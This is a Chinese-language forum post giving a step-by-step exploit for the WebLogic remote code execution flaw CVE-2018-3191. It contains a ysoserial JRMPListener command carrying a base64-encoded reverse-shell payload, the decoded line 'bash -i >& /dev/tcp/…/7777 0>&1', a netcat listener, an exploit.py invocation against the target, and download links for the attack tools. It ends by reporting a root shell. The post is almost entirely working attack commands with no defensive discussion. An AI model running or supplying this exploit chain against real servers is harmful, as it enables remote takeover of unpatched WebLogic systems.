请选择 进入手机版 | 继续访问电脑版
查看: 472|回复: 0

WebLogic远程代码执行-CVE-2018-3191

[复制链接]
  • TA的每日心情
    擦汗
    3 小时前
  • 签到天数: 687 天

    [LV.9]以坛为家II

    发表于 2018-10-26 20:24:21 | 显示全部楼层 |阅读模式
    # CVE-2018-3191
    CVE-2018-3191 反弹shell
    本地ip:172.16.38.1
    Weblogic:172.16.38.174:7001
    1、        本地执行
    [AppleScript] 纯文本查看 复制代码
    java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'


    然后执行 nc -lvv 7777

    (1)        其中的 bash 命令为避免Runtime.getRuntime().exec() 执行过程中将特殊符号转义,进行了base64转码解码的操作,明文为
    [AppleScript] 纯文本查看 复制代码
    bash -i >& /dev/tcp/172.16.38.1/7777 0>&1

    (2)        此操作在本地监听一个JRMPListener,接收被攻击的weblogic 的请求,并执行指定的bash 反弹命令。
    (3)        Nc 监听7777等待weblogic 主机反弹bash连接。
    2、        执行
    [AppleScript] 纯文本查看 复制代码
    python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222
    ,利用漏洞使weblogic 访问远程rmi服务,并执行bash反弹命令。


    3、        nc监听的端口收到反弹的bash,root权限。

    攻击所需工具:
    [AppleScript] 纯文本查看 复制代码
    ysoserial-master.jar //反序列化利用工具[url]https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar[/url]
    weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 payload生成工具
    [url]https://github.com/voidfyoo/CVE-2018-3191/releases[/url]
    exploit.py //weblogic t3协议发送工具,集成CVE-2018-3191 payload



    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表